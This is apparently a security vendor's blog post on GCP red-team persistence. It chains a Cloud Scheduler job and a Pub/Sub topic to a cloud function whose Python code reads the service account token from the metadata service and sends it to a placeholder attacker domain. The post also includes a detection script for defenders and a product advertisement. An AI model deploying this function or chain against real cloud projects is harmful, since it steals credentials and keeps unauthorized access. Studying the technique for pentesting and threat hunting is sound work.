How to Pentest or Redteam GCP Using Cron Jobs and Persistence Techniques

Introduction

Nowadays, the vast majority of companies are running in the cloud. AWS, GCP (Google Cloud Platform), and Azure are some of the most popular cloud providers, so as a security engineer it's important to be well equipped to handle these types of engagements. Performing a security engagement against a cloud provider can be relatively hard because little information is available on red teaming and cloud penetration testing. GCP is one cloud provider you might run into during an engagement, so it is important to know how to approach GCP penetration testing. For a complete guide on cloud security, download the eBook written from a hacker's perspective. This guide will help you understand GCP vulnerability assessment and penetration testing.

If you're performing a red team exercise, setting up persistence in your target environment is key. No one wants to lose days of work because they lost access to the target, which is why you need to know a few persistence techniques. These techniques are also great for the blue team and threat hunters, so they know what to look for when searching for signs of compromise.

Cron Job

If you’re familiar with Linux cron jobs, Google Cloud Scheduler is the same thing. It's common for Linux malware to use cron jobs for persistence, and the same technique can be used in Google Cloud penetration testing.

These cron jobs can be used as triggers for many things, but I'll be using one to send a Pub/Sub message. We can then set up a cloud function that will be triggered when it receives a Pub/Sub message. The cloud function can do anything you want, but I'll be using it to send service account credentials to an attacker's machine.

This attack only involves three steps, as shown below:

  • Create a Pub/Sub topic
  • Create a cron job task
  • Create the malicious cloud function

The first step is to create a Pub/Sub topic, as shown below. This topic will be used to trigger the cloud function every time a cron job fires.

  • gcloud pubsub topics create mytopic

Next, create a cron job. In this example, I'll create a cron job that executes every minute. This cron job will post a message to the Pub/Sub topic, ultimately triggering the malicious cloud function.

  • gcloud scheduler jobs create pubsub myjob --schedule "* * * * *" --topic mytopic --message-body "Hello"

Finally, create the malicious cloud function. This function should be used to do some malicious action. In this example, it will send the attacker an authentication token.

  • gcloud functions deploy <CLOUD-FUNCTION-NAME> --entry-point <PYTHON-FUNCTION-NAME> --runtime python37 --trigger-topic=<TOPIC-NAME>

As shown below, the cloud function’s source code is fairly simple. First, we hit the metadata service to grab the attached service account’s authentication token. Then we send this to the attacker via a GET request.

import requests
import json

def evil_pubsub(event, context):
    """Triggered from a message on a Cloud Pub/Sub topic.

    Args:
         event (dict): Event payload.
         context (google.cloud.functions.Context): Metadata for the event.
    """
    r = requests.get(url="http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token", headers={"Metadata-Flavor": "Google"})
    PARAMS = {"data": r.text}
    requests.get(url="http://<ATTACKER-DOMAIN-HERE>/", params=PARAMS)

Once the cron job runs, it will send a message to the Pub/Sub topic. The malicious cloud function will be listening to this topic and, when triggered, it grabs the attached service account creds and sends them to the attacker's machine.

Cron jobs have been used as a persistence technique for years, and we can use the same techniques for persistence in the cloud.
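For the blue team, the chain described above (a Scheduler job publishing to a Pub/Sub topic that triggers a cloud function) can be hunted for by correlating a project's resource inventory. The following is an added example, not code from the original post: the sample data is constructed, its field names follow the Cloud Scheduler and Cloud Functions (1st gen) REST resources, and every project, job, and function name is made up.

```python
import json

# Constructed sample data shaped like `gcloud scheduler jobs list --format=json`
# and `gcloud functions list --format=json` (1st gen); all names are made up.
SCHEDULER_JOBS = json.loads("""[
  {"name": "projects/demo/locations/us-central1/jobs/myjob",
   "schedule": "* * * * *",
   "pubsubTarget": {"topicName": "projects/demo/topics/mytopic"}},
  {"name": "projects/demo/locations/us-central1/jobs/nightly-report",
   "schedule": "0 2 * * *",
   "pubsubTarget": {"topicName": "projects/demo/topics/reports"}},
  {"name": "projects/demo/locations/us-central1/jobs/healthcheck",
   "schedule": "*/5 * * * *",
   "httpTarget": {"uri": "https://example.internal/health"}}
]""")
FUNCTIONS = json.loads("""[
  {"name": "projects/demo/locations/us-central1/functions/helper",
   "serviceAccountEmail": "demo@appspot.gserviceaccount.com",
   "eventTrigger": {"eventType": "google.pubsub.topic.publish",
                    "resource": "projects/demo/topics/mytopic"}},
  {"name": "projects/demo/locations/us-central1/functions/api",
   "serviceAccountEmail": "api-sa@demo.iam.gserviceaccount.com",
   "httpsTrigger": {"url": "https://example.invalid/api"}}
]""")

def runs_every_few_minutes(schedule):
    """True when the cron minute field is '*' or a '*/n' step."""
    minute = schedule.split()[0]
    return minute == "*" or minute.startswith("*/")

def find_chains(jobs, functions):
    """Link each Pub/Sub-targeting job to the functions its topic triggers."""
    by_topic = {}
    for fn in functions:
        trigger = fn.get("eventTrigger") or {}
        if "pubsub" in trigger.get("eventType", "") and trigger.get("resource"):
            by_topic.setdefault(trigger["resource"], []).append(fn)
    chains = []
    for job in jobs:
        topic = (job.get("pubsubTarget") or {}).get("topicName")
        for fn in by_topic.get(topic, []):
            chains.append({"job": job["name"].rsplit("/", 1)[-1],
                "schedule": job["schedule"], "topic": topic,
                "function": fn["name"].rsplit("/", 1)[-1],
                "service_account": fn.get("serviceAccountEmail"),
                "high_frequency": runs_every_few_minutes(job["schedule"])})
    return chains

if __name__ == "__main__":
    for chain in find_chains(SCHEDULER_JOBS, FUNCTIONS):
        print(json.dumps(chain))
```

Each reported chain names the service account the function runs as, which is the identity whose token is exposed; any chain nobody on the team can account for deserves a look at the function's source and its outbound traffic.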

Red Sentry Cloud Scanner

If you want to check the security posture of your company's cloud environment, Red Sentry has a very impressive cloud scanner that identifies security vulnerabilities and checks for misconfigurations, privilege escalation, and much more in AWS, GCP, and Azure environments. After the scan, you can download a full report on the findings and view our recommendations on how to fix the vulnerabilities found. In addition to our cloud scanner, we also offer traditional penetration testing of various cloud environments.

If you want us to look at your cloud environment so you can better secure yourself, schedule a manual pentest or sign up for our cloud vulnerability scanner today!

Conclusion

The cloud is still relatively new, but it's being adopted by almost everyone. As a security professional, it's important to understand the types of attacks that can be performed on these environments. Being able to set up persistence in your target’s environment, or if you're on the defensive side, being able to detect persistence techniques, is vital. A cron job is one of many persistence techniques that can be used when pentesting GCP. It's relatively easy to set up and can easily go unnoticed by defenders if they aren't aware of this technique. For a complete guide on cloud security, download the eBook written from a hacker's perspective.

Alex Thomas
CTO, Founder
Alex started his career as an ethical hacker, eventually working as a penetration tester, hacking into Fortune 500 companies all day long. Alex invented the Red Sentry software platform, a tool that could help people take action before they were victim to a hack. Pairing this software with a team of seasoned pentesters, Red Sentry has created a hybrid approach that allows businesses to get a thorough manual pentest quickly, while also utilizing the Red Sentry software to ensure year-round security.
